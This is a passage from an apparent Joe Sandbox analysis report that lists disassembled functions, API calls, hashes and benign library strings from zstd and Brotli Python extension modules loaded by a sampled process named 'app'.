                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_Mem_$MallocString$FreeMemorySizeSubtypeTuple_Type_
                                                                                                                                                                                                            • String ID: ZstdBufferWithSegments cannot be empty$arguments must be BufferWithSegments instances$must pass at least 1 argument
                                                                                                                                                                                                            • API String ID: 946150407-1379776884
                                                                                                                                                                                                            • Opcode ID: 8fdac9aaf58b18c8ba38e122fa620e2748ab5cef8205acfceb5098a336757764
                                                                                                                                                                                                            • Instruction ID: 4415ea5054f8e61d5256f3589779ff84996d25c4c9a981fbb43685c4cd2be165
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8fdac9aaf58b18c8ba38e122fa620e2748ab5cef8205acfceb5098a336757764
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D1412866A0AF06A2EA10CF25A84453C33A4FB49BE4F090636DE5D437A4DF7CE5A5E314
                                                                                                                                                                                                            Function 00007FF8A7FF9AC0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 105COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Object_$Arg_AttrBufferCallDeallocErr_FormatKeywords_ObjectParseSizeStringTrueTuple
                                                                                                                                                                                                            • String ID: O|KkO:stream_reader$error setting source source: %s$must pass an object with a read() method or that conforms to the buffer protocol$read
                                                                                                                                                                                                            • API String ID: 3867929704-1248902592
                                                                                                                                                                                                            • Opcode ID: c16cc93634b5362c8f41f1ed6ea24e0d923dd8b1d038cb3711f6f109bfce3f2b
                                                                                                                                                                                                            • Instruction ID: cb70a5ff51ef24307407813184591d7bb19c5c0287cdb4517451905e0871a71d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c16cc93634b5362c8f41f1ed6ea24e0d923dd8b1d038cb3711f6f109bfce3f2b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A1513732A0AB4692EB50CF25E88426D33A4FB88FD0F554136CA5E877A4DF38D5A5C710
                                                                                                                                                                                                            Function 00007FF7ACE87810 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 91COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Token$ConvertDescriptorInformationProcessSecurityString$CloseCreateCurrentDirectoryErrorFreeHandleLastLocalOpen
                                                                                                                                                                                                            • String ID: D:(A;;FA;;;%s)$S-1-3-4
                                                                                                                                                                                                            • API String ID: 4998090-2855260032
                                                                                                                                                                                                            • Opcode ID: 3a311ca896c23303b083235c6b21b739ade8233c859481b729e43c8a7aab684c
                                                                                                                                                                                                            • Instruction ID: 969b948f3fdb2a544950ed6ba1935ade683a4ef494db15deae2b2830ab80e4c8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a311ca896c23303b083235c6b21b739ade8233c859481b729e43c8a7aab684c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D241A53261D782A6E750AF11E4446AAF361FB84795F850231FA5E67AF4DF3CD408CB10
                                                                                                                                                                                                            Function 00007FF8A7FFF8B0 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 88COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Buffer_Release$Arg_Err_FormatKeywords_ParseSizeTuple
                                                                                                                                                                                                            • String ID: offset within segments array references memory outside buffer$segments array size is not a multiple of %zu$y*y*:BufferWithSegments
                                                                                                                                                                                                            • API String ID: 3888823503-1353136108
                                                                                                                                                                                                            • Opcode ID: 51d914ab6df999cd9288f3fdb9d47c246dcc8a148b1c1abec9f33b7f40e5537a
                                                                                                                                                                                                            • Instruction ID: 1272189749ed27bd4104e4fc925c24e90efb5cb165b2439c3cdda47927544402
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51d914ab6df999cd9288f3fdb9d47c246dcc8a148b1c1abec9f33b7f40e5537a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C8416332A19F82A2EE608F25E85036D73A0FB95BC4F445235DA8D137A5DF7CE5A5C304
                                                                                                                                                                                                            Function 00007FF8A8003A60 Relevance: 20.2, APIs: 16, Instructions: 224COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001,?), ref: 00007FF8A8003A99
                                                                                                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001,?), ref: 00007FF8A8003AA5
                                                                                                                                                                                                            • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001,?), ref: 00007FF8A8003AF5
                                                                                                                                                                                                              • Part of subcall function 00007FF8A7FFFAB0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF8A7FFFB73
                                                                                                                                                                                                              • Part of subcall function 00007FF8A7FFFAB0: fprintf.MSPDB140-MSVCRT ref: 00007FF8A7FFFB8A
                                                                                                                                                                                                              • Part of subcall function 00007FF8A7FFFAB0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF8A7FFFB94
                                                                                                                                                                                                              • Part of subcall function 00007FF8A7FFFAB0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF8A7FFFB9D
                                                                                                                                                                                                              • Part of subcall function 00007FF8A7FFFAB0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF8A7FFFBA8
                                                                                                                                                                                                              • Part of subcall function 00007FF8A7FFFAB0: fprintf.MSPDB140-MSVCRT ref: 00007FF8A7FFFBB8
                                                                                                                                                                                                              • Part of subcall function 00007FF8A7FFFAB0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF8A7FFFBC2
                                                                                                                                                                                                              • Part of subcall function 00007FF8A7FFFAB0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF8A7FFFBCB
                                                                                                                                                                                                              • Part of subcall function 00007FF8A7FFFAB0: memmove.VCRUNTIME140 ref: 00007FF8A7FFFC4C
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001,?), ref: 00007FF8A8003B5A
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001,?), ref: 00007FF8A8003B63
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001,?), ref: 00007FF8A8003BE5
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001,?), ref: 00007FF8A8003BEE
                                                                                                                                                                                                            • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001,?), ref: 00007FF8A8003C49
                                                                                                                                                                                                              • Part of subcall function 00007FF8A7FFFAB0: memmove.VCRUNTIME140 ref: 00007FF8A7FFFC5C
                                                                                                                                                                                                              • Part of subcall function 00007FF8A7FFFAB0: memset.VCRUNTIME140 ref: 00007FF8A7FFFC69
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001,?), ref: 00007FF8A8003D95
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001,?), ref: 00007FF8A8003DAA
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001,?), ref: 00007FF8A8003DC3
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001,?), ref: 00007FF8A8003DCC
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001,?), ref: 00007FF8A8003DE7
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001,?), ref: 00007FF8A8003DF0
                                                                                                                                                                                                              • Part of subcall function 00007FF8A80040F0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00007FF8A800419E
                                                                                                                                                                                                              • Part of subcall function 00007FF8A80040F0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00007FF8A80041C3
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001,?), ref: 00007FF8A8003E0B
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001,?), ref: 00007FF8A8003E14
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: free$__acrt_iob_funcmallocmemmove$fflushfprintf$memset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 307045256-0
                                                                                                                                                                                                            • Opcode ID: 5370d4b22be78fb839b6b516b2ab587cbf84f2cdde9dbcffab721f886a083ec4
                                                                                                                                                                                                            • Instruction ID: f6ab65344dc0be44788f2575ac2aba0d3563dc3c465fe69f36401fc0b7fb130e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5370d4b22be78fb839b6b516b2ab587cbf84f2cdde9dbcffab721f886a083ec4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16A1AE3250AF8595DA268F25B4013AAB3A4FF49BE4F054235EE9E13B94DF3CD1A1C714
                                                                                                                                                                                                            Function 00007FF8A801C3F0 Relevance: 19.7, APIs: 13, Instructions: 194COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.VCRUNTIME140(?,?,?,00000279,?,00000279,?,00007FF8A80607C1), ref: 00007FF8A801C478
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077230: memset.VCRUNTIME140(?,?,?,?,?,?,?,?,00000000,00007FF8A7FF350E), ref: 00007FF8A807727D
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077230: InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF8A7FF350E), ref: 00007FF8A80772EE
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077230: InitializeConditionVariable.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF8A7FF350E), ref: 00007FF8A80772FB
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077230: InitializeConditionVariable.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF8A7FF350E), ref: 00007FF8A8077308
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077230: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00000000,00007FF8A7FF350E), ref: 00007FF8A80773B6
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077230: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00000000,00007FF8A7FF350E), ref: 00007FF8A80773C4
                                                                                                                                                                                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000279,?,00000279,?,00007FF8A80607C1), ref: 00007FF8A801C482
                                                                                                                                                                                                            • memset.VCRUNTIME140(?,?,?,00000279,?,00000279,?,00007FF8A80607C1), ref: 00007FF8A801C538
                                                                                                                                                                                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8A801C542
                                                                                                                                                                                                            • InitializeCriticalSection.KERNEL32 ref: 00007FF8A801C569
                                                                                                                                                                                                            • InitializeConditionVariable.KERNEL32 ref: 00007FF8A801C572
                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32 ref: 00007FF8A801C610
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32 ref: 00007FF8A801C61D
                                                                                                                                                                                                            • memset.VCRUNTIME140 ref: 00007FF8A801C636
                                                                                                                                                                                                            • InitializeCriticalSection.KERNEL32 ref: 00007FF8A801C642
                                                                                                                                                                                                            • InitializeConditionVariable.KERNEL32 ref: 00007FF8A801C64F
                                                                                                                                                                                                            • InitializeCriticalSection.KERNEL32 ref: 00007FF8A801C65C
                                                                                                                                                                                                            • InitializeConditionVariable.KERNEL32 ref: 00007FF8A801C669
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Initialize$CriticalSection$ConditionVariable$memset$calloc$EnterLeave_beginthreadex_errno
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2416272369-0
                                                                                                                                                                                                            • Opcode ID: 3386ea11123b8719f3fa4faf729558dbb714d14ec974c689c241498ce3266f5e
                                                                                                                                                                                                            • Instruction ID: 34adc2fd32f92bdd2076c1f47373538b93c427947f238fa4c40b676bc8b334bc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3386ea11123b8719f3fa4faf729558dbb714d14ec974c689c241498ce3266f5e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9881B132A1AF82A2EB19DF2594512A9A3A0FF587D4F054235DB8E076A0DF3CE5A1C744
                                                                                                                                                                                                            Function 00007FF8A7FF4A90 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 96COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Object_$Err_StringTrue$Arg_AttrBufferCallDeallocFormatKeywords_ObjectParseSizeTuple
                                                                                                                                                                                                            • String ID: O|kOO:stream_reader$must pass an object with a read() method or that conforms to the buffer protocol$read
                                                                                                                                                                                                            • API String ID: 4086204872-2737067712
                                                                                                                                                                                                            • Opcode ID: 0e065d7b493d3b196c270754ab225a088168b63bc27d6643e82d6d11d8807553
                                                                                                                                                                                                            • Instruction ID: 076092e67af8030df7a1aa212c33cf1e09644ea48de4807c8675f20bd3d4108e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0e065d7b493d3b196c270754ab225a088168b63bc27d6643e82d6d11d8807553
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6B413632A0AB46A1EB508F69E85427D33A4FB98BD0F558136CA8D83394DF7CD9A4D314
                                                                                                                                                                                                            Function 00007FF8A7FFEDC0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 52COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ReadyType_$Module_Object
                                                                                                                                                                                                            • String ID: BufferSegment$BufferSegments$BufferWithSegments$BufferWithSegmentsCollection
                                                                                                                                                                                                            • API String ID: 3123587515-3060106826
                                                                                                                                                                                                            • Opcode ID: 7ce8e4062ccbe84f2a64e7a0a053fb87031a0827ed894e252c60fb3c78cff6c4
                                                                                                                                                                                                            • Instruction ID: 66b8830032e2a68f5ff118b6c915629f78a5ddf16ad4ee5e539abe34d813278d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7ce8e4062ccbe84f2a64e7a0a053fb87031a0827ed894e252c60fb3c78cff6c4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E218E60A0BA07B1FE009F59B89027437A4FF197D8F561536C81E536A4DF3CE1A9D368
                                                                                                                                                                                                            Function 00007FF7ACE82030 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                            • String ID: P%
                                                                                                                                                                                                            • API String ID: 2147705588-2959514604
                                                                                                                                                                                                            • Opcode ID: f5a3bd79b12c7c571d23b6b5ebdfb181c7e65479c9c05912b09222cce72f5b00
                                                                                                                                                                                                            • Instruction ID: 0b7826430d0cf7a90934adf39a70d1d8bb12a0e76d323ea0f73b036c269b5f03
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f5a3bd79b12c7c571d23b6b5ebdfb181c7e65479c9c05912b09222cce72f5b00
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE51F536609BA186D634AF26E4181BAF7A1FB98B62F004121EBCF53694DF3CD045DB20
                                                                                                                                                                                                            Function 00007FF8A8188D20 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286027871.00007FF8A8130000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286080256.00007FF8A818A000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286165822.00007FF8A81FF000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8201000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8205000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a8130000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$Size$Arg_Buffer_Bytes_FromParseReleaseStringTuple_
                                                                                                                                                                                                            • String ID: BrotliDecoderDecompressStream failed while processing the stream$y*:process
                                                                                                                                                                                                            • API String ID: 2462486908-3378180327
                                                                                                                                                                                                            • Opcode ID: 405fa514e34b714207f512a25961ea2d5ce005277f14c34fc5658b2c22ae73a3
                                                                                                                                                                                                            • Instruction ID: eec6ddafb8b7ece4be2608209d87dd857e89b73e543b18a3c18350ab62b121d3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 405fa514e34b714207f512a25961ea2d5ce005277f14c34fc5658b2c22ae73a3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0331E462B0AB86A2EA159F21E4092A86364FF44BD0F180635DA6D03798DF7CE891C324
                                                                                                                                                                                                            Function 00007FF8A81892F0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286027871.00007FF8A8130000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286080256.00007FF8A818A000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286165822.00007FF8A81FF000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8201000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8205000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a8130000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$Size$Arg_Buffer_Bytes_FromParseReleaseStringTuple_
                                                                                                                                                                                                            • String ID: BrotliEncoderCompressStream failed while processing the stream$y*:process
